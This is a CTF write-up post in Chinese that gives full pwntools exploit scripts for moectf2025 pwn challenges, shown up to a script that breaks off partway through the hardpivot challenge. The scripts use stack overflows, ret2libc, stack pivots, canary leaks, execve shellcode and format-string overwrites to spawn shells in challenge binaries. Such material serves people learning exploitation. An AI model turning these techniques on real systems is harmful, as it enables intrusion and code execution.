0x00

粗糙地贴一份moectf2025以及newstarctf2025(至week3) pwn方向的全解。笔者已经不是新生,贴全题解也不是为了享受炸鱼快感。原本不打算发布,只是因为一些事,有一些感慨,所以发布此题解,仅仅希望能帮助到正在看的你,也权且算是笔者投身 pwn 的一次回望。
0x01 - 0x16 为 moectf2025 题解，0x17 及以后为 newstarctf2025 week3 前的题解。

0x01 boom

#!/usr/bin/env python3
"""moectf2025 pwn - boom.

Stack overflow past a 4-byte check value that the target appears to derive
from rand() after seeding with the current time. The script reproduces that
value with the same libc and then returns into a backdoor function.
"""
from pwn import *
import ctypes

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 50188
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
# gdb commands used by gdb.debug(); the debug-symbol and source paths are local to the author's machine.
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''


def start():
    """Return a tube to the target: local process (P), remote service (R), otherwise under gdb."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


io = start()

# Load the same libc through ctypes so that rand() yields the target's sequence.
# srand(time(0)) only agrees with the target when both run in the same second.
clib = ctypes.CDLL("/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6")
clib.srand(clib.time(0))
canary = clib.random() % 114514  # NOTE(review): assumes the target computes its check value exactly like this - confirm in the binary
backdoor = 0x40127e  # backdoor function address; the binary is presumably non-PIE since this is absolute

io.recvuntil(b'(y/n)')
io.sendline(b'y')

io.recvuntil(b'message:')
# Layout: 0x7c bytes of filler, the 4-byte check value, 0x10 more bytes, one
# dummy 8-byte slot (presumably the saved rbp) and finally the return address.
payload = b'\x00'*0x7c + p32(canary) + b'\x00'*0x10 + p64(0xdeadbeef) + p64(backdoor)
io.sendline(payload)


io.interactive()

0x02 boom_revenge

#!/usr/bin/env python3
"""moectf2025 pwn - boom_revenge.

Same idea as boom (time-seeded rand() check value, overflow into a backdoor),
but the seed is computed after the connection is opened and nudged by one
second for the remote instance.
"""
from pwn import *
import ctypes

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 54984
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
# gdb commands used by gdb.debug(); paths are local to the author's machine.
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''


def start():
    """Return a tube to the target: local process (P), remote service (R), otherwise under gdb."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


clib = ctypes.CDLL("/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6")
io = start()
# The seed is taken after start() so it is as close as possible to the moment
# the target calls time(); the +1 is the author's adjustment for the remote
# instance (presumably clock/latency skew - it may need tuning).
seed = clib.time(0) + 1 # remote + 1
clib.srand(seed)
canary = clib.random() % 114514  # NOTE(review): assumes the target derives its check value exactly like this
log.info("canary --> "+hex(canary))

backdoor = 0x40127e  # backdoor function address in the non-PIE binary

io.recvuntil(b'(y/n)')
io.sendline(b'y')

io.recvuntil(b'message:')
# 0x7c filler, 4-byte check value, 0x10 filler, one dummy 8-byte slot, return address.
payload = b'\x00'*0x7c + p32(canary) + b'\x00'*0x10 + p64(0xdeadbeef) + p64(backdoor)
io.sendline(payload)

io.interactive()

0x03 call_it

#!/usr/bin/env python3
"""moectf2025 pwn - call_it.

Menu-driven target. The script fills a table of "gestures" with a /bin/sh
string, bumps a counter with option 6, and then stores two 8-byte values
(a gift gadget and a system-calling stub) that the program later calls.
The exact data structure is not visible here; the sequence below was
worked out against the binary.
"""
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 60044
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
# gdb commands used by gdb.debug(); paths are local to the author's machine.
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''


def start():
    """Return a tube to the target: local process (P), remote service (R), otherwise under gdb."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


io = start()

menu = b'Choose your gesture: '

# Five rounds of option 3, each storing a NUL-terminated "/bin/sh".
for _ in range(5):
    io.recvuntil(menu)
    io.sendline(b'3')
    io.recvuntil(b'?')
    io.sendline(b'/bin/sh\x00')

gift = 0x401235         # helper in the binary (absolute address: non-PIE)
call_system = 0x401228  # stub that calls system()
binsh = 0x404060        # where the "/bin/sh" string ends up (.bss)

# Three times option 6; per the author's note this brings n_gesture to 7.
for _ in range(3):
    io.recvuntil(menu)
    io.sendline(b'6') # n_gesture = 7

io.recvuntil(menu)
io.sendline(b'3')
io.recvuntil(b'?')
# gift followed by binsh (0x404060) written as 7 raw bytes instead of p64 -
# presumably because the input field is shorter than 16 bytes; confirm against the binary.
io.sendline(p64(gift) + b'\x60\x40\x40\x00\x00\x00\x00')

io.recvuntil(menu)
io.sendline(b'3')
io.recvuntil(b'?')
io.sendline(p64(call_system))

# Earlier variant kept by the author for reference:
# myio(b'6', p64(gift) + b'/bin/sh')
# myio(b'6', p64(call_system))

io.interactive()

0x04 ez_u64

"""moectf2025 pwn - ez_u64.

The target prints 8 raw bytes after "hint." and expects them back as a
decimal number; u64() does the little-endian unpacking.
"""
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 55998
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
# gdb commands used by gdb.debug(); paths are local to the author's machine.
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''


def start():
    """Return a tube to the target: local process (P), remote service (R), otherwise under gdb."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


io = start()

# Your exploit here
io.recvuntil(b'hint.')
leak_data=u64(io.recv(8))
num=int(leak_data)  # u64() already returns an int; int() here is a no-op
io.sendline(str(num))  # str is accepted by pwntools tubes and encoded on the way out

io.interactive()

0x05 ezlibc

"""moectf2025 pwn - ezlibc.

Two-stage ret2libc: the target prints a PLT address (gives the PIE base),
the first overflow returns to main, the second leak gives read()'s libc
address, and the second overflow runs system("/bin/sh").
"""
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 58058
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
# gdb commands used by gdb.debug(); paths are local to the author's machine.
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''


def start():
    """Return a tube to the target: local process (P), remote service (R), otherwise under gdb."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


io = start()

# Your exploit here
# First leak: a hex value that the author treats as read@plt; 0x1060 is its
# offset inside the binary, so subtracting gives the load base.
io.recvuntil(b'0x')
read_plt_addr=int(io.recv(12),16)
log.success(hex(read_plt_addr))
elf_base=read_plt_addr-0x1060
log.success(hex(elf_base))

main_addr=elf_base+0x11ce
ret=elf_base+0x101a  # single 'ret' gadget, used for stack alignment
# 0x20 filler plus one 8-byte value reach the return slot (the second stage
# uses 0x28 of filler for the same distance); then ret + main to run again.
payload=b'a'*0x20+p64(read_plt_addr)+p64(ret)+p64(main_addr)
io.send(payload)

# Second leak: the program prints again, this time the author reads read()'s
# resolved libc address and derives the libc base from the symbol table.
io.recvuntil(b'0x')
read_addr=int(io.recv(12),16)
log.success(hex(read_addr))
#libc = LibcSearcher("read",read_addr)
#libc_base=read_addr-libc.dump("read")
libc_base=read_addr-libc.sym['read']
log.success(hex(libc_base))

pop_rdi_ret=libc_base+0x2a3e5  # 'pop rdi; ret' in this libc build (hard-coded offset)
ret=pop_rdi_ret+1              # rebinds `ret` to the libc 'ret' gadget (the ELF one above is no longer needed)

#binsh=libc_base+libc.dump("str_bin_sh")
#sys=libc_base+libc.dump("system")
# NOTE(review): the other scripts pass bytes to search(); a str works only
# because pwntools encodes it - b'/bin/sh' would be consistent.
binsh=libc_base+next(libc.search('/bin/sh'))
sys=libc_base+libc.sym['system']

payload=b'a'*0x28+p64(ret)+p64(pop_rdi_ret)+p64(binsh)+p64(sys)
io.send(payload)

io.interactive()

0x06 ezpivot

"""moectf2025 pwn - ezpivot.

Stack pivot: a large first input (presumably stored at .bss) carries a fake
frame, and a short overflow of the second input rewrites saved rbp and the
return address with 'leave; ret' so execution continues on that frame.
"""
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 62363
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
# gdb commands used by gdb.debug(); paths are local to the author's machine.
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''


def start():
    """Return a tube to the target: local process (P), remote service (R), otherwise under gdb."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


io = start()

# Your exploit here
system = elf.plt['system']
pop_rdi_ret = 0x401219
ret = 0x401219 + 1   # the 'ret' that follows 'pop rdi'
leave_ret = 0x40120f
bss = 0x404060       # assumed destination of the first input - TODO confirm

# 0x100 copies of "/bin/sh\0" = 0x800 bytes, so the fake frame begins at
# bss + 0x800: saved-rbp slot (bss), alignment ret, then system("/bin/sh")
# with rdi pointing at the start of the buffer.
payload = b'/bin/sh\x00'*0x100 + p64(bss) + p64(ret) + p64(pop_rdi_ret) + p64(bss) + p64(system)
io.recvuntil(b'introduction.')
io.sendline(b'-1')  # presumably defeats a signed length check; verify against the binary
io.send(payload)

# Second input: 0xc filler, saved rbp -> bss + 0x800, return -> leave_ret,
# which moves rsp onto the fake frame.
payload = b'a'*0xc + p64(bss + 0x800) + p64(leave_ret)
io.recvuntil(b'number:')
io.send(payload)

io.interactive()

0x07 ezprotection

#!/usr/bin/env python3
"""moectf2025 pwn - ezprotection.

Leaks the stack canary and saved rbp by overwriting the canary's terminating
NUL byte so the echo runs past it, then re-sends both and does a 2-byte
partial overwrite of the return address.
"""
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 64058
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
# gdb commands used by gdb.debug(); paths are local to the author's machine.
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''


def start():
    """Return a tube to the target: local process (P), remote service (R), otherwise under gdb."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


io = start()

#
orw_low = 0x128c  # low bytes of the target function inside the PIE image

# 0x18 bytes reach the canary; the extra 'b' replaces its low NUL byte so
# that the program's echo continues into the canary and saved rbp.
payload = b'a'*0x18 + b'b'
io.send(payload)

io.recvuntil(b'aab')
# 7 bytes of canary come back; the low byte is restored to 0x00 by rjust.
canary = u64(io.recv(7).rjust(0x8, b'\x00'))
log.success("canary --> "+hex(canary))
# Saved rbp is a 6-byte user-space pointer; ljust pads to 8.
rbp = u64(io.recv(6).ljust(0x8, b'\x00'))
log.success("rbp --> "+hex(rbp))

io.recvuntil(b'bytes.')
# Only the two low bytes of the return address are written (0x728c): the
# low 12 bits (0x28c) come from orw_low; the 0x7 nibble is randomized by
# ASLR, so this presumably succeeds only some of the runs.
payload = b'a'*0x18 + p64(canary) + p64(rbp) + b'\x8c' + b'\x72'
io.send(payload)

io.interactive()

0x08 ezshellcode

"""moectf2025 pwn - ezshellcode.

The target runs user-supplied bytes; the script sends a small execve shellcode.
"""
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 62001
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
# gdb commands used by gdb.debug(); paths are local to the author's machine.
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''


def start():
    """Return a tube to the target: local process (P), remote service (R), otherwise under gdb."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


io = start()

# Your exploit here
# execve("/bin//sh", NULL, NULL): 0x68732f2f6e69622f is "/bin//sh" little-endian,
# pushed after a NULL terminator; rsp then points at the string. 59 is the
# x86-64 execve number and cdq zeroes rdx from the positive eax.
shellcode = asm('''
xor rsi, rsi
push rsi
mov rdi, 0x68732f2f6e69622f
push rdi
push rsp
pop rdi
mov al, 59
cdq
syscall
''')
io.sendline(b'4')  # menu choice, presumably
io.recvuntil(b'set.\n')
io.send(shellcode)


io.interactive()

0x09 eztext

"""moectf2025 pwn - eztext.

Plain ret2text: a short overflow returns straight into a function at 0x4011cd.
"""
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3/amd64/libc6_2.35-0ubuntu3_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 65306
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
# gdb commands used by gdb.debug(); paths are local to the author's machine.
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3/amd64/libc6-dbg_2.35-0ubuntu3_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3/amd64/glibc-source_2.35-0ubuntu3_all/usr/src/glibc/glibc-2.35
'''


def start():
    """Return a tube to the target: local process (P), remote service (R), otherwise under gdb."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


io = start()

# Your exploit here
sys_addr=0x4011cd
ret=0x40101a  # defined but not used below (no alignment gadget needed here, apparently)
io.recvuntil(b'?')
io.sendline(b'100')  # answer to the prompt - presumably a length; confirm against the binary
payload=b'a'*0x10+p64(sys_addr)  # 0x10 bytes reach the return address
io.sendline(payload)

io.interactive()

0x0a find_it

"""moectf2025 pwn - find_it.

No memory corruption: the program asks what to open and which fd to use,
and the script answers "flag" and fd 1 (stdout). The lesson is that letting
the user choose file names and descriptors is itself the bug.
"""
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 53309
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
# gdb commands used by gdb.debug(); paths are local to the author's machine.
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''


def start():
    """Return a tube to the target: local process (P), remote service (R), otherwise under gdb."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


io = start()

# Your exploit here
io.recvuntil(b'it?\n')
io.sendline(b'3')       # menu choice (meaning not visible here)
io.recvuntil(b'see?\n')
io.sendline(b'flag')    # file name the program opens
io.recvuntil(b'fd?\n')
io.sendline(b'1')       # fd 1 = stdout, so whatever is written lands on our tube

io.interactive()

0x0b fmt

"""moectf2025 pwn - fmt.

Read-only format string: "%7$s" prints the string a stack slot points to and
"%10$p" prints a stack slot's raw value; the latter is turned back into ASCII.
"""
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.39-0ubuntu8/amd64/libc6_2.39-0ubuntu8_amd64/usr/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 59478
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
# gdb commands used by gdb.debug(); paths are local to the author's machine.
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.39-0ubuntu8/amd64/libc6-dbg_2.39-0ubuntu8_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.39-0ubuntu8/amd64/glibc-source_2.39-0ubuntu8_all/usr/src/glibc/glibc-2.39
'''


def start():
    """Return a tube to the target: local process (P), remote service (R), otherwise under gdb."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


io = start()

# Your exploit here
io.recvuntil(b'name?')
payload=b'%7$s%10$p'
io.sendline(payload)
io.recvuntil(b'Nice to meet you,')
str2=io.recv(5)        # the %7$s part: 5 bytes of the pointed-to string
log.success(str2)
io.recvuntil(b'0x')
hex_str=io.recv(10)    # 10 hex digits = 5 bytes of the %10$p value
# %p prints the most significant byte first, so if that slot holds in-memory
# text the characters come out in reverse order; the author leaves it as-is.
str1=bytes.fromhex(hex_str.decode()).decode('ascii')
log.success(str1)

io.interactive()

0x0c fmt_S

"""moectf2025 pwn - fmt_S.

Repeated format-string writes. Every round has the same shape: "%<N>c"
emits N characters and "%<k>$hn" stores that count (16 bits) through the
pointer in argument k. Argument 17 is a stack slot that itself points into
the stack (a "trampoline"): writing its low 16 bits re-aims it, and a
subsequent "%47$hn" then writes wherever it points. The rounds below use
that to flip a loop variable, rewrite main's return address to a one_gadget
two bytes at a time, and set up an rbp the gadget's constraints accept.
"""
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.8/amd64/libc6_2.35-0ubuntu3.8_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 56167
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
# gdb commands used by gdb.debug(); paths are local to the author's machine.
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.8/amd64/libc6-dbg_2.35-0ubuntu3.8_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.8/amd64/glibc-source_2.35-0ubuntu3.8_all/usr/src/glibc/glibc-2.35
b talk
'''


def start():
    """Return a tube to the target: local process (P), remote service (R), otherwise under gdb."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


io = start()

# Your exploit here
# Leak round: %8$p gives a stack address, %33$p gives a return address inside
# __libc_start_main (128 bytes past the symbol in this libc).
payload=b'%8$p%33$p'
io.recvuntil(b'him...')
io.sendline(payload)
io.recvuntil(b'0x')
stack_addr=int(io.recv(12),16)
ret_addr=stack_addr-0x18+0x20   # slot holding main's return address (offsets found in gdb)
i_addr=ret_addr+0x10-0x20       # slot holding the loop variable i
log.success("ret_addr in stack-->"+hex(ret_addr))
log.success("i_addr in stack-->"+hex(i_addr))
io.recvuntil(b'0x')
libc_start_main=int(io.recv(12),16)-128
libc_base=libc_start_main-libc.sym['__libc_start_main']
log.success("libc_base-->"+hex(libc_base))
io.recvuntil(b'battle!')
io.send(p64(0))

# Aim the trampoline at i's slot (+7: the byte whose sign bit is flipped next - assumption).
payload='%{}c'.format((i_addr & 0xffff) + 7).encode() + b"%17$hn"
io.recvuntil(b'him...')
io.send(payload)
io.recvuntil(b'battle!')
io.send(p64(0))

# Write 0xff into that byte: sets i's sign bit.
payload='%{}c'.format(0xff).encode() + b"%47$hhn"
io.recvuntil(b'him...')
io.send(payload)
io.recvuntil(b'battle!')
io.send(p64(0))

# Aim the trampoline at main's return-address slot.
payload='%{}c'.format(ret_addr & 0xffff).encode() + b"%17$hn"
io.recvuntil(b'him...')
io.send(payload)
io.recvuntil(b'battle!')
io.send(p64(0))

backdoor=libc_base+0xebd3f #one_gadget

#0xebd3f execve("/bin/sh", rbp-0x50, [rbp-0x70])
#constraints:
#address rbp-0x48 is writable
#rax == NULL || {rax, r12, NULL} is a valid argv
#[[rbp-0x70]] == NULL || [rbp-0x70] == NULL || [rbp-0x70] is a valid envp

# Low 16 bits of main's return address.
payload='%{}c'.format(backdoor & 0xffff).encode() + b"%47$hn"
io.recvuntil(b'him...')
io.send(payload)
io.recvuntil(b'battle!')
io.send(p64(0))

# Aim the trampoline two bytes further into the return-address slot.
payload='%{}c'.format((ret_addr & 0xffff) + 2).encode() + b"%17$hn"
io.recvuntil(b'him...')
io.send(payload)
io.recvuntil(b'battle!')
io.send(p64(0))

# Bits 16..31 of main's return address (the upper bytes are left untouched).
payload='%{}c'.format((backdoor >> 16) & 0xffff).encode() + b"%47$hn"
io.recvuntil(b'him...')
io.send(payload)
io.recvuntil(b'battle!')
io.send(p64(0))

rbp_addr=ret_addr-0x8  # main's saved rbp sits just below the return address

# Aim the trampoline at the saved-rbp slot.
payload='%{}c'.format(rbp_addr & 0xffff).encode() + b"%17$hn"
io.recvuntil(b'him...')
io.send(payload)
io.recvuntil(b'battle!')
io.send(p64(0))

rbp=ret_addr+0x80-0x8  # an rbp value for which the one_gadget constraints hold (chosen by the author)

# Low 16 bits of rbp.
payload='%{}c'.format(rbp & 0xffff).encode() + b"%47$hn"
io.recvuntil(b'him...')
io.send(payload)
io.recvuntil(b'battle!')
io.send(p64(0))

# Trampoline -> saved rbp + 2.
payload='%{}c'.format((rbp_addr & 0xffff) + 2).encode() + b"%17$hn"
io.recvuntil(b'him...')
io.send(payload)
io.recvuntil(b'battle!')
io.send(p64(0))

# Bits 16..31 of rbp.
payload='%{}c'.format((rbp >> 16) & 0xffff).encode() + b"%47$hn"
io.recvuntil(b'him...')
io.send(payload)
io.recvuntil(b'battle!')
io.send(p64(0))

# Trampoline -> saved rbp + 4.
payload='%{}c'.format((rbp_addr & 0xffff) + 4).encode() + b"%17$hn"
io.recvuntil(b'him...')
io.send(payload)
io.recvuntil(b'battle!')
io.send(p64(0))

# Bits 32..47 of rbp; the final '0' answer makes main return into the gadget.
payload='%{}c'.format((rbp >> 32) & 0xffff).encode() + b"%47$hn"
io.recvuntil(b'him...')
io.send(payload)
io.recvuntil(b'battle!')
io.sendline(b'0')

io.interactive()

0x0d fmt_T

#!/usr/bin/env python3
"""moectf2025 pwn - fmt_T.

Format-string GOT overwrite: leak a libc address via "%11$p", then write
system's low 32 bits over printf's GOT entry in two 16-bit halves. Only the
low two 16-bit halves are rewritten because printf and system share the
upper bytes within the same libc mapping.
"""
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.8/amd64/libc6_2.35-0ubuntu3.8_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 60002
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
# gdb commands used by gdb.debug(); paths are local to the author's machine.
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.8/amd64/libc6-dbg_2.35-0ubuntu3.8_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.8/amd64/glibc-source_2.35-0ubuntu3.8_all/usr/src/glibc/glibc-2.35
b printf
'''


def start():
    """Return a tube to the target: local process (P), remote service (R), otherwise under gdb."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


io = start()

#
payload = b'%11$p'
io.send(payload)
io.recvuntil(b'0x')
# The leaked slot is 0x30 below the __libc_start_main symbol (offset found in gdb).
libc_base = int(io.recv(12), 16) + 0x30 - libc.sym['__libc_start_main']
log.success("libc_base --> "+hex(libc_base))

system = libc_base + libc.sym['system']
target_got = elf.got['printf']
log.info("target addr --> "+hex(target_got))
log.info("printf addr --> "+hex(libc_base+libc.sym['printf']))
log.info("system addr --> "+hex(system))

# Input that will be handed to the (soon redirected) printf; its meaning
# depends on how the target reuses the buffer - not visible here.
payload = b'%;sh'
io.recvuntil(b'hell.\n')
io.send(payload)

# Two pointers placed on the stack for the write: target_got, and 0x40401a
# written as 7 raw bytes (presumably target_got + 2; confirm with elf.got['printf']).
payload = p64(target_got) + b'\x1a\x40\x40\x00\x00\x00\x00'
io.recvuntil(b'hell.\n')
io.send(payload)

# Author's check that arguments 24/25 hold the two pointers:
#payload = b'-%24$p-%25$p-'
#io.recvuntil(b'hell.\n')
#io.send(payload)

# %n counts every character printed so far, so the second width is the
# difference from the first; +0x10000 keeps it positive (it is masked by hn).
val1 = (system & 0xffff)
val2 = ((system >> 16) & 0xffff) - val1 + 0x10000
payload = '%{}c'.format(val1).encode() + b"%24$hn" + '%{}c'.format(val2).encode() + b"%25$hn"
io.recvuntil(b'hell.\n')
io.send(payload.ljust(26))  # padded to a fixed length the target presumably expects

io.interactive()

0x0e hardpivot

#!/usr/bin/env python3
"""moectf2025 pwn - hardpivot.

Three-stage stack pivot into .bss. Each read() fills a 0x40-byte buffer at
rbp-0x40, so each stage sets the next rbp and ends with 'leave; ret' to move
rsp onto data the previous stage wrote.
"""
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 64689
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
# gdb commands used by gdb.debug(); paths are local to the author's machine.
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
